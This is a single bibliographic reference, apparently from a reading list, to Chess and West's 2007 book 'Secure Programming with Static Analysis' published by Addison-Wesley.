• Brian Chess, Jacob West. Secure Programming with Static Analysis. Addison-Wesley, 2007.